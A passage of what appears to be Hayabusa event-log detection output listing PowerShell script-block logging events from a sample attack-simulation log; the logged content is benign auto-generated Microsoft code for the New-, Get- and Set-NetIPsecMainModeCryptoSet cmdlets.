$myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} 